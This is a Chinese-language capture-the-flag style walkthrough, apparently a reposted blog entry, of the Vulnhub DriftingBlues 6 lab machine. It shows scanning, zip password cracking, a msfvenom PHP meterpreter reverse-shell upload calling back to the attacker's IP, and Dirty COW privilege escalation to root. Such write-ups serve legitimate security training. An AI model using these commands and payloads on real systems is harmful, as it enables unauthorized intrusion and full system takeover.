IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> 看完这篇 教你玩转渗透测试靶机vulnhub——driftingblues6_vh -> 正文阅读

[网络协议]看完这篇 教你玩转渗透测试靶机vulnhub——driftingblues6_vh

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

Vulnhub靶机下载:

官网地址:https://www.vulnhub.com/entry/driftingblues-6,672/

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用netdiscover发现主机
在这里插入图片描述
渗透机:kali IP :172.16.5.42 靶机IP :172.16.5.12

使用命令:nmap -sS -sV -A -n 172.16.5.12

在这里插入图片描述
发现只有一个80端口 进行访问查看

在这里插入图片描述

使用dirb 172.16.5.12扫描网站的后台 发现了robots.txt 发现禁止爬取,然后根据提示访问 /textpattern/textpattern 发现了登入后台
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
他还给了一个提示 :别忘了加上,zip扩展到你的dir brute

②:开始目录爆破:

使用命令:python3 dirsearch.py -u http://172.16.5.12/ -e php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20  

在这里插入图片描述
在这里插入图片描述
先把这个zip下载下来 然后在解压 但是发现需要密码
在这里插入图片描述

③:暴力破解zip:

可以使用fcrackzip 破解, 字典也是kali自带的, 也可以使用john

使用命令:zip2join spammer.zip  >  password.txt
john password.txt   #执行

在这里插入图片描述
得到密码是:myspace4

然后打开 zip 里面有个creds.txt 使用cat 查看一下 就是后台登入的账号和密码:mayer:lionheart
在这里插入图片描述

③:上传WebShell:

登入后台以后 需要找上传点 然后我们发现了一个Files 模块 可以进行上传。
在这里插入图片描述
这里可以使用的方法很多,我们就使用最简单的使用msfveom 制作一个php 回弹shell的木马 然后设置监听 运行木马即可。

msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.5.42 lport=886 -f raw > webshell.php

-p : 指定payload 为 php/meterpreter/reverse_tcp
-f :设置输出格式(raw)

在这里插入图片描述

使用模块:use exploit/multi/handler

设置payload :set payload php/meterpreter/reverse_tcp
设置 监听端口和ip:

在这里插入图片描述

④:脏牛提权:

进入后渗透模块 先看一下基本信息,因为是一个www-data账户,需要升级到root权限。查看靶机内核信息:sysinfo 发现内核版本是 脏牛提权。
在这里插入图片描述
执行searchsploit 40839 然后upload 上传 40839.c 文件 gcc 编译 然后 ./运行
在这里插入图片描述
在这里插入图片描述
靶机执行:gcc -pthread 40839.c -o 40839 -lcrypt
为了保险给777权限:chmod 777 40839
最后执行:./40839
会要求你输入一个新的密码:

在这里插入图片描述
需要在shell 里面写一个python交互:

python -c 'import pty; pty.spawn("/bin/sh")'

然后切换用户 就是最高权限root了 查看flag

⑤:获取flag:

在这里插入图片描述

Vulnhub靶机渗透总结:

因为是第一次做也做了挺久的,但是这个靶场也不难 只要细心一点就可以了,需要主要的一些细节就是 :
1.msfvenom 生成的php木马需要把注释去掉
2.提权是时候需要给777权限
3.要写python 交互 不然切换不了用户
最后 看了 别人写的文章都没怎么写php 回弹木马 这里具体写了一下 针对刚入门的小伙伴比较合适看,创作不易 希望对大家有所帮助!!

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-03-21 21:30:49  更:2022-03-21 21:34:02 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/26 5:47:05-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码